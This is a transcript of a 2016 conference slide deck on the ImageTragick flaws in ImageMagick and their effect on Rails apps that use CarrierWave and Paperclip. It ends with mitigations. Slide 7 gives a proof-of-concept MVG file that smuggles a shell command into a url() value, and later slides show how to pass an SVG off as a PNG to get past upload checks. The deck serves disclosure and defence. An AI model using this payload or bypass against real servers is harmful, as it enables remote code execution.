Upgrade to Pro — share decks privately, control downloads, hide ads and more …

ImageTragick and Rails

ImageTragick and Rails

This talk looks at the details of ImageTragick, how Ruby on Rails applications may be affected, and steps to mitigate the problem. A live demonstration of the vulnerability was performed on a Rails application as part of the original presentation at WellRailed.

ImageTragick is a collection of security vulnerabilities publicly disclosed in May 2016 that affected the ImageMagick image processing library. The most critical vulnerability potentially allowed an attacker to gain remote access to a system by uploading a file to an exposed web application.

Presented at WellRailed on 26 May 2016 — https://www.meetup.com/wellrailed/events/231113047

Sample vulnerable Rails application and Docker image — https://github.com/gchan/imagetragick-rails

Blog post — https://blog.devgordon.com/imagetragick-and-rails/

Gordon Chan

May 26, 2016
Tweet

Other Decks in Programming

Transcript

  1. What is ImageMagick? ImageMagick® is a so ware suite that

    allows you to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, JPEG-2000, GIF, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG. https://www.imagemagick.org
  2. Magic Bytes ImageMagick identifies file type by its first few

    bytes # I m a g e M a g i c k / M a g i c k C o r e / m a g i c . c { " J P E G " , 0 , M a g i c P a t t e r n ( " \ 3 7 7 \ 3 3 0 \ 3 7 7 " ) } , { " G I F " , 0 , M a g i c P a t t e r n ( " G I F 8 " ) } , { " P N G " , 0 , M a g i c P a t t e r n ( " \ 2 1 1 P N G \ r \ n \ 0 3 2 \ n " ) } , { " S V G " , 1 , M a g i c P a t t e r n ( " ? X M L " ) } , { " M V G " , 0 , M a g i c P a t t e r n ( " p u s h g r a p h i c - c o n t e x t " ) } , Ignores file extensions $ i d e n t i f y r o s e . f o o r o s e . f o o J P E G 7 0 x 4 6 7 0 x 4 6 + 0 + 0 8 - b i t s R G B 2 . 3 6 K B 0 . 0 0 0 u 0 : 0 0 . 0 0 0
  3. Coders and Delegates Coders support the reading and/or writing of

    an image format (e.g. JPEG) Delegates (external libraries) may be used to process files $ c o n v e r t - l i s t d e l e g a t e . . . b m p < = w d p " m v " % i " " % i . b m p " ; " J x r E n c A p p " - i " % i . b m p " - o " % o . j x r " ; m v " b l e n d e r = > " b l e n d e r " - b " % i " - F P N G - o " % o " " \ n " c o n v e r t " - c o n c a t e n a t e " % o * . p n g d o c = > " s o f f i c e " - - h e a d l e s s - - c o n v e r t - t o p d f - - o u t d i r ` d i r n a m e " % i " ` p d f < = > p s " g s " - q - d Q U I E T - d S A F E R - d B A T C H - d N O P A U S E - d N O P R O M P T - d M a x B i t m a p = m p e g = > " f f m p e g " - n o s t d i n - v - 1 - i " % i " - v f r a m e s % S - v c o d e c p a m - a n - f r a w h t t p s = > " c u r l " - s - k - L - o " % o " " h t t p s : % M " . . .
  4. Delegates use system() Commands are executed in the host environment

    " c u r l " - s - k - L - o " % o " " h t t p s : % M " Parameters are substituted for values (e.g. file names, URLs) " c u r l " - s - k - L - o " / v a r / t m p / m a g i c k - 9 5 5 5 8 " " h t t p s : / / a . c o m / i m g . j p g "
  5. Magick Vector Graphics (MVG) Describes 2D vector and mixed vector/raster

    graphics p u s h g r a p h i c - c o n t e x t v i e w b o x 0 0 6 2 4 3 6 9 a f f i n e 0 . 2 8 3 6 3 6 0 0 0 . 2 8 3 8 4 6 - 0 - 0 p u s h g r a p h i c - c o n t e x t p u s h g r a p h i c - c o n t e x t f i l l ' d a r k s l a t e b l u e ' s t r o k e ' b l u e ' s t r o k e - w i d t h 1 r e c t a n g l e 1 , 1 2 1 9 9 , 1 2 9 9 f i l l ' u r l ( h t t p s : / / e x a m p l e . c o m / i m g . j p g ) ' u r l ( ) will use the HTTPS delegate i.e c u r l " c u r l " - s - k - L - o " / v a r / t m p / m a g i c k 2 3 " " h t t p s : / / e x a m p l e . c o m / i m g . j p g "
  6. ImageTragick Public disclosure on May 3, 2016 Collection of security

    vulnerabilities Remote code execution (RCE) File reading/moving/deletion Server-side request forgery (SSRF)
  7. CVE-2016-3714 Insufficient character filtering leads to code execution # e

    x p l o i t . m v g p u s h g r a p h i c - c o n t e x t v i e w b o x 0 0 6 4 0 4 8 0 f i l l ' u r l ( h t t p s : / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d " ) ' $ c o n v e r t e x p l o i t . m v g o u t . p n g h e l l o w o r l d HTTPS delegate " c u r l " - s - k - L - o " % o " " h t t p s : % M " # ' % M ' i s r e p l a c e d w i t h ' / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d ' " c u r l " . . . " h t t p s : / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d
  8. Attack Vector Attacker uploads an image containing code they choose

    Image is processed with ImageMagick => code is executed
  9. Ruby on Rails Ruby gems for file and image uploads

    - P a p e r c l i p and C a r r i e r W a v e Both depend on M i n i M a g i c k for processing images M i n i M a g i c k is a wrapper for ImageMagick
  10. File Extensions Mean Nothing File name/extension and content-type whitelisting C

    a r r i e r W a v e believes what you tell it — no file inspection Remember — ImageMagick uses 'magic bytes' to identify file types, not file extensions ∴ C a r r i e r W a v e is vulnerable
  11. Paperclip is Vulnerable P a p e r c l

    i p inspects files to check its content-type $ f i l e - b - - m i m e i m a g e . p n g i m a g e / p n g ; c h a r s e t = b i n a r y But it only looks at the first part of the content-type (i m a g e ) So we can present an SVG as a PNG $ f i l e - b - - m i m e s v g . p n g i m a g e / s v g + x m l ; c h a r s e t = u s - a s c i i SVGs can reference external images (!)
  12. Demo - Rails Application Ruby 2.3.1 Rails 4.2.6 CarrierWave 0.11.2

    Paperclip 4.3.6 MiniMagick 4.5.1 Debian 'jessie' ImageMagick 8:6.8.9.9-5+deb8u1 Docker - gordonchan/imagetragick-rails Rails and Docker defaults https://github.com/gchan/imagetragick-rails
  13. Code #1 c l a s s C a r

    r i e r W a v e I m a g e U p l o a d e r < C a r r i e r W a v e : : U p l o a d e r : : B a s e v e r s i o n : t h u m b { p r o c e s s r e s i z e _ t o _ f i l l : [ 2 0 0 , 2 0 0 ] } . . . d e f e x t e n s i o n _ w h i t e _ l i s t ; % w ( j p g j p e g g i f p n g ) ; e n d d e f c o n t e n t _ t y p e _ w h i t e l i s t ; [ / i m a g e \ / / ] ; e n d e n d
  14. Code #2 c l a s s I m a

    g e < A c t i v e R e c o r d : : B a s e m o u n t _ u p l o a d e r : c a r r i e r _ w a v e _ i m a g e , C a r r i e r W a v e I m a g e U p l o a d e r h a s _ a t t a c h e d _ f i l e : p a p e r c l i p _ i m a g e , s t y l e s : { t h u m b : " 1 0 0 x 1 0 0 # " } v a l i d a t e s _ a t t a c h m e n t _ c o n t e n t _ t y p e : p a p e r c l i p _ i m a g e , c o n t e n t _ t y p e : [ " i m a g e / j p e g " , " i m a g e / p n g " ] v a l i d a t e s _ a t t a c h m e n t _ f i l e _ n a m e : p a p e r c l i p _ i m a g e , m a t c h e s : [ / p n g \ Z / , / j p e ? g \ Z / ]
  15. Mitigation Patches available for Debian (May 16) Ubuntu patches coming

    soon? (as at May 26) Disable vulnerable coders (policy.xml) Test magic bytes of untrusted files Consider ImageMagick alternatives Sandbox image processing (seccomp, SELinux) General server security